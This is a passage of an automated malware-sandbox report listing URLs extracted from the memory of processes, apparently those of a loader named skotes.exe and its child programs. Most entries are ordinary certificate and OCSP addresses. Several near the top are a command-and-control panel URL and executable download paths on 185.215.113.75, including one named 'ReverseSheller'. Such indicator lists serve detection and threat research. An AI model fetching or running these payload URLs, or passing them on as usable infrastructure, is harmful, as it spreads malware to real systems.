                                Source: skotes.exe, 0000000E.00000003.22824291132.0000000001084000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpQT4un
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpW
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpm
                                Source: skotes.exe, 0000000E.00000003.23137775135.000000000108D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/1453454495/Fe36XBk.exe
                                Source: skotes.exe, 0000000E.00000002.23306638646.0000000005C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/563390996/0l1LuE1.exe
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/5643377291/7fOMOTQ.exe
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/5643377291/7fOMOTQ.exeje
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001036000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23306638646.0000000005C5B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301420244.0000000001012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/5765828710/ViGgA8C.exe
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/5765828710/ViGgA8C.exe.AppDataB
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/5765828710/ViGgA8C.exe?6q
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/5765828710/ViGgA8C.exeE1.exe
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/5765828710/ViGgA8C.exeZ0123456789
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/5765828710/ViGgA8C.exe_7Q
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/5765828710/ViGgA8C.exea
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/5765828710/ViGgA8C.exeph
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/5765828710/ViGgA8C.exesQ
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/5957639473/8OH46ok.exe
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/5957639473/8OH46ok.exeve
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/6158422886/r7MRNUY.exe
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/6158422886/r7MRNUY.exe6g
                                Source: skotes.exe, 0000000E.00000002.23306638646.0000000005C5B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/7133380843/X7kkUXr.exe
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/7133380843/X7kkUXr.exe2dG
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/7133380843/X7kkUXr.exeVd
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/7133380843/X7kkUXr.exee7
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/7244183739/L5shRfh.exe
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/7244183739/L5shRfh.exeDe
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/LostRobotic/random.exe
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000000FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/ReverseSheller/random.exe
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/asjduwgsgausi/random.exe
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000000FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/asjduwgsgausi/random.exe1ee3
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/asjduwgsgausi/random.exe2i
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000000FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/asjduwgsgausi/random.exece31
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/c0dxnfz/random.exe
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/c0dxnfz/random.exemf
                                Source: skotes.exe, 0000000E.00000003.22824291132.0000000001084000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/fate/random.exe
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/fate/random.exe#
                                Source: skotes.exe, 0000000E.00000003.22824291132.0000000001084000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/none/random.exe
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000000FBB000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301420244.0000000000FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/osint1618/random.exe
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000000FBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/osint1618/random.exeshqos.dll1
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/rast333a/random.exe
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.75/files/rast333a/random.exeQf
                                Source: skotes.exe, 0000000E.00000003.22824291132.0000000001084000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000003.23137775135.0000000001093000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301841769.0000000001093000.00000004.00000020.00020000.00000000.sdmp, 7ecb69d7f1.exe.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22356353438.0000000005AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                                Source: skotes.exe, 0000000E.00000003.22824291132.0000000001084000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000003.23137775135.0000000001093000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301841769.0000000001093000.00000004.00000020.00020000.00000000.sdmp, 7ecb69d7f1.exe.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                Source: skotes.exe, 0000000E.00000003.22824291132.0000000001084000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000003.23137775135.0000000001093000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301841769.0000000001093000.00000004.00000020.00020000.00000000.sdmp, 7ecb69d7f1.exe.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                Source: skotes.exe, 0000000E.00000003.22824291132.0000000001084000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000003.23137775135.0000000001093000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301841769.0000000001093000.00000004.00000020.00020000.00000000.sdmp, 7ecb69d7f1.exe.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                Source: powershell.exe, 00000006.00000002.22100471555.0000000000A02000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.22108124379.000001D344733000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22405813701.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22391403036.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22377181188.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000002.22450108734.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22319632165.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22447151682.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22307013969.0000000000B40000.00000004.00000020.00020000.00000000.sdmp, f891ed3167.exe, 00000026.00000002.22708013785.0000000001413000.00000004.00000020.00020000.00000000.sdmp, f8e8a2d2f0.exe, 0000002B.00000002.22746723106.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000030.00000002.23328929289.0000000005120000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                                Source: Macromedia.com, 0000001D.00000003.22453338526.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000002.22806589599.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22728498508.0000000001C55000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22730718703.0000000001C5A000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787599721.0000000001C57000.00000004.00000020.00020000.00000000.sdmp, Derived.25.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                                Source: Macromedia.com, 0000001D.00000003.22453338526.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000002.22806589599.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22728498508.0000000001C55000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22730718703.0000000001C5A000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787599721.0000000001C57000.00000004.00000020.00020000.00000000.sdmp, Derived.25.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                                Source: Macromedia.com, 0000001D.00000003.22453338526.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000002.22806589599.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22728498508.0000000001C55000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22730718703.0000000001C5A000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787599721.0000000001C57000.00000004.00000020.00020000.00000000.sdmp, Derived.25.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                                Source: Macromedia.com, 0000001D.00000003.22453338526.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000002.22806589599.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22728498508.0000000001C55000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22730718703.0000000001C5A000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787599721.0000000001C57000.00000004.00000020.00020000.00000000.sdmp, Derived.25.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                                Source: Macromedia.com, 0000001D.00000003.22453338526.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000002.22806589599.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22728498508.0000000001C55000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22730718703.0000000001C5A000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787599721.0000000001C57000.00000004.00000020.00020000.00000000.sdmp, Derived.25.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                                Source: powershell.exe, 00000006.00000002.22100471555.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.22108124379.000001D344733000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22405813701.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22391403036.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22377181188.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000002.22450108734.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22319632165.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22447151682.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22307013969.0000000000B40000.00000004.00000020.00020000.00000000.sdmp, f891ed3167.exe, 00000026.00000002.22708013785.0000000001413000.00000004.00000020.00020000.00000000.sdmp, f8e8a2d2f0.exe, 0000002B.00000002.22746723106.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000030.00000002.23328929289.0000000005120000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22356353438.0000000005AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22356353438.0000000005AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                                Source: skotes.exe, 0000000E.00000003.22824291132.0000000001084000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000003.23137775135.0000000001093000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301841769.0000000001093000.00000004.00000020.00020000.00000000.sdmp, 7ecb69d7f1.exe.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22356353438.0000000005AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                                Source: skotes.exe, 0000000E.00000003.22824291132.0000000001084000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000003.23137775135.0000000001093000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301841769.0000000001093000.00000004.00000020.00020000.00000000.sdmp, 7ecb69d7f1.exe.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                Source: skotes.exe, 0000000E.00000003.22824291132.0000000001084000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000003.23137775135.0000000001093000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301841769.0000000001093000.00000004.00000020.00020000.00000000.sdmp, 7ecb69d7f1.exe.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                Source: 7ecb69d7f1.exe.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22356353438.0000000005AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22356353438.0000000005AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
                                Source: skotes.exe, 0000000E.00000003.22824291132.0000000001084000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000003.23137775135.0000000001093000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301841769.0000000001093000.00000004.00000020.00020000.00000000.sdmp, 7ecb69d7f1.exe.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22356353438.0000000005AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                                Source: MSBuild.exe, 00000030.00000002.23300450970.0000000000D3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                                Source: MSBuild.exe, 00000030.00000002.23328929289.0000000005120000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                                Source: 7ecb69d7f1.exe, 00000011.00000000.22411971310.0000000000409000.00000002.00000001.01000000.00000014.sdmp, 7ecb69d7f1.exe, 00000011.00000002.22421328029.0000000000409000.00000002.00000001.01000000.00000014.sdmp, 7ecb69d7f1.exe.14.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                                Source: powershell.exe, 00000006.00000002.22116820974.0000000005BAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.22103430133.000001D33C8C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.22103430133.000001D33C783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22356353438.0000000005AAE000.00000004.00000800.00020000.00000000.sdmp, 7ecb69d7f1.exe.14.drString found in binary or memory: http://ocsp.digicert.com0
                                Source: skotes.exe, 0000000E.00000003.22824291132.0000000001084000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000003.23137775135.0000000001093000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301841769.0000000001093000.00000004.00000020.00020000.00000000.sdmp, 7ecb69d7f1.exe.14.drString found in binary or memory: http://ocsp.digicert.com0A
                                Source: skotes.exe, 0000000E.00000003.22824291132.0000000001084000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000003.23137775135.0000000001093000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301841769.0000000001093000.00000004.00000020.00020000.00000000.sdmp, 7ecb69d7f1.exe.14.drString found in binary or memory: http://ocsp.digicert.com0C
                                Source: skotes.exe, 0000000E.00000003.22824291132.0000000001084000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000003.23137775135.0000000001093000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301841769.0000000001093000.00000004.00000020.00020000.00000000.sdmp, 7ecb69d7f1.exe.14.drString found in binary or memory: http://ocsp.digicert.com0X
                                Source: Macromedia.com, 0000001D.00000003.22453338526.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000002.22806589599.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22728498508.0000000001C55000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22730718703.0000000001C5A000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787599721.0000000001C57000.00000004.00000020.00020000.00000000.sdmp, Derived.25.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22355696927.0000000005A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22356353438.0000000005AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/gtsr100
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22356353438.0000000005AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                                Source: Macromedia.com, 0000001D.00000003.22453338526.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000002.22806589599.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22728498508.0000000001C55000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22730718703.0000000001C5A000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787599721.0000000001C57000.00000004.00000020.00020000.00000000.sdmp, Derived.25.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                                Source: Macromedia.com, 0000001D.00000003.22453338526.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000002.22806589599.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22728498508.0000000001C55000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22730718703.0000000001C5A000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787599721.0000000001C57000.00000004.00000020.00020000.00000000.sdmp, Derived.25.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                                Source: Macromedia.com, 0000001D.00000003.22453338526.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000002.22806589599.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22728498508.0000000001C55000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22730718703.0000000001C5A000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787599721.0000000001C57000.00000004.00000020.00020000.00000000.sdmp, Derived.25.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                                Source: powershell.exe, 00000006.00000002.22105137448.0000000004C97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.22087972626.000001D32C935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                Source: powershell.exe, 00000006.00000002.22105137448.0000000004C97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png4
                                Source: powershell.exe, 00000009.00000002.22087972626.000001D32C935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22356353438.0000000005AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
                                Source: Macromedia.com, 0000001D.00000002.22806589599.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787599721.0000000001C57000.00000004.00000020.00020000.00000000.sdmp, AchillesGuard.com, 00000022.00000002.22811935171.000000000139F000.00000004.00000020.00020000.00000000.sdmp, AchillesGuard.com, 00000022.00000003.22799002107.0000000001389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microk
                                Source: Macromedia.com, 0000001D.00000002.22806589599.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787599721.0000000001C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microkke
                                Source: AchillesGuard.com, 00000022.00000002.22811935171.000000000139F000.00000004.00000020.00020000.00000000.sdmp, AchillesGuard.com, 00000022.00000003.22799002107.0000000001389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microkkf
                                Source: powershell.exe, 00000006.00000002.22105137448.0000000004B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.22087972626.000001D32C711000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000030.00000002.23306198292.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: Macromedia.com, 0000001D.00000003.22453338526.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000002.22806589599.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22728498508.0000000001C55000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22730718703.0000000001C5A000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787599721.0000000001C57000.00000004.00000020.00020000.00000000.sdmp, Derived.25.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                                Source: Macromedia.com, 0000001D.00000003.22453338526.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000002.22806589599.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22728498508.0000000001C55000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22730718703.0000000001C5A000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787599721.0000000001C57000.00000004.00000020.00020000.00000000.sdmp, Derived.25.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                                Source: powershell.exe, 00000006.00000002.22105137448.0000000004C97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.22087972626.000001D32C935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                Source: powershell.exe, 00000006.00000002.22105137448.0000000004C97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
                                Source: powershell.exe, 00000009.00000002.22087972626.000001D32C935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
                                Source: Macromedia.com, 0000001D.00000002.22803107041.0000000000B45000.00000002.00000001.01000000.00000015.sdmp, Macromedia.com, 0000001D.00000003.22453338526.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, AchillesGuard.com, 00000022.00000000.22464341551.0000000000DD5000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/X
                                Source: skotes.exe, 0000000E.00000003.22824291132.0000000001084000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000003.23137775135.0000000001093000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301841769.0000000001093000.00000004.00000020.00020000.00000000.sdmp, 7ecb69d7f1.exe.14.drString found in binary or memory: http://www.digicert.com/CPS0
